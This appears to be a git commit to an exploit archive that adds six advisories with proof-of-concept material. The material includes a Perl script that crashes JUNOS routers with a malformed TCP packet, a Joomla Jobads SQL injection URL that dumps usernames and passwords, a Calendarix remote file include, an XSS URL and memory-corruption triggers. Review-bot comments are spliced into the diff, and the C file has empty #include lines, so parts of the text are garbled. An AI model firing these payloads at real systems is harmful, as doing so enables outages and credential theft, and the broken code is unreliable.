From d9c7bc59dbacf6390419278b7a546baabd53734a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 24 May 2014 04:36:31 +0000
Subject: [PATCH] Updated 05_24_2014
---
 files.csv | 6 ++++++
 platforms/asp/webapps/33481.txt | 9 +++++++++
 platforms/hardware/dos/33476.pl | 30 ++++++++++++++++++++++++++++++
 platforms/linux/dos/33480.txt | 9 +++++++++
 platforms/osx/dos/33479.c | 17 +++++++++++++++++
 platforms/php/webapps/33477.txt | 9 +++++++++
 platforms/php/webapps/33478.txt | 7 +++++++
 7 files changed, 87 insertions(+)
 create mode 100755 platforms/asp/webapps/33481.txt
 create mode 100755 platforms/hardware/dos/33476.pl
 create mode 100755 platforms/linux/dos/33480.txt
 create mode 100755 platforms/osx/dos/33479.c
 create mode 100755 platforms/php/webapps/33477.txt
 create mode 100755 platforms/php/webapps/33478.txt
diff --git a/files.csv b/files.csv
index 322710d99..d37e9f28b 100755
--- a/files.csv
+++ b/files.csv
@@ -30159,3 +30159,9 @@ id,file,description,date,author,platform,type,port
 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0
 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0
 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0
+33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
+33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0
+33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0
+33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0
+33480,platforms/linux/dos/33480.txt,"MATLAB R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0
+33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0
diff --git a/platforms/asp/webapps/33481.txt b/platforms/asp/webapps/33481.txt
new file mode 100755
index 000000000..13201b71f
--- /dev/null
+++ b/platforms/asp/webapps/33481.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37695/info
+
+DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BlogWorx 1.0 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln]
\ No newline at end of file
diff --git a/platforms/hardware/dos/33476.pl b/platforms/hardware/dos/33476.pl
new file mode 100755
index 000000000..5cf77cd31
--- /dev/null
+++ b/platforms/hardware/dos/33476.pl
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/37670/info
+
+JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets.
+
+JUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues.
+
+JUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected.
+
+#!/usr/bin/perl
+
+my $host = shift;
+my $port = shift;
+
+use Net::Packet qw($Env);
+
+use Net::Packet::IPv4;
+my $ip = Net::Packet::IPv4->new(dst => $host);
+
+use Net::Packet::TCP;
+
+my $tcp = Net::Packet::TCP->new(
+ dst => $port,
+ options => "\x65\x02\x01\x01",
+ );
+
+use Net::Packet::Frame;
+my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
+
+$frame->send;
+exit 0;
\ No newline at end of file
diff --git a/platforms/linux/dos/33480.txt b/platforms/linux/dos/33480.txt
new file mode 100755
index 000000000..57d0cbfd2
--- /dev/null
+++ b/platforms/linux/dos/33480.txt
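Review bot: In platforms/hardware/dos/33476.pl the header states that JUNOS 7.x, 8.x and 9.x are affected, but the files.csv row added by this commit titles the same entry `JUNOS <= 7.1.1`. The title should be aligned with the header so that anyone scoping exposure from the index does not read only the narrower range. The `options => "\x65\x02\x01\x01"` line also carries no explanation. A comment such as `# TCP option kind 0x65 (101), length 2, then two NOP pads` would tell readers what to look for in a packet capture or an IDS rule.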
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37688/info
+
+MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+MATLAB R2009b is affected; other versions may also be vulnerable.
+
+cxib=0.
\ No newline at end of file
diff --git a/platforms/osx/dos/33479.c b/platforms/osx/dos/33479.c
new file mode 100755
index 000000000..57387a1e5
--- /dev/null
+++ b/platforms/osx/dos/33479.c
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/37687/info
+
+Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+Mac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable.
+
+#include
+#include
+int main ()
+{
+char number[] = "0.1111111111...11", *e;
+double weed = strtod(number, &e);
+printf("grams = %lf\n", weed);
+return 0;
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/33477.txt b/platforms/php/webapps/33477.txt
new file mode 100755
index 000000000..450f6fa12
--- /dev/null
+++ b/platforms/php/webapps/33477.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37673/info
+
+Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Calendarix 0.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cal_config.inc.php?calpath= EVIL SITE???
\ No newline at end of file
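Review bot: In platforms/osx/dos/33479.c the header says attackers may execute arbitrary code, while the path and the files.csv row file the entry under `dos`. The header or the classification should say which impact was actually demonstrated, since defenders use it to set patch priority. The same mismatch appears in platforms/linux/dos/33480.txt in this commit. The literal `"0.1111111111...11"` is an elided placeholder rather than real input, which deserves a comment such as `/* digit string abbreviated in the source advisory */`. As shown here, both `#include` directives have no header name, possibly lost in extraction.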
diff --git a/platforms/php/webapps/33478.txt b/platforms/php/webapps/33478.txt
new file mode 100755
index 000000000..f07e562b2
--- /dev/null
+++ b/platforms/php/webapps/33478.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37686/info
+
+The Jobads component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users--
\ No newline at end of file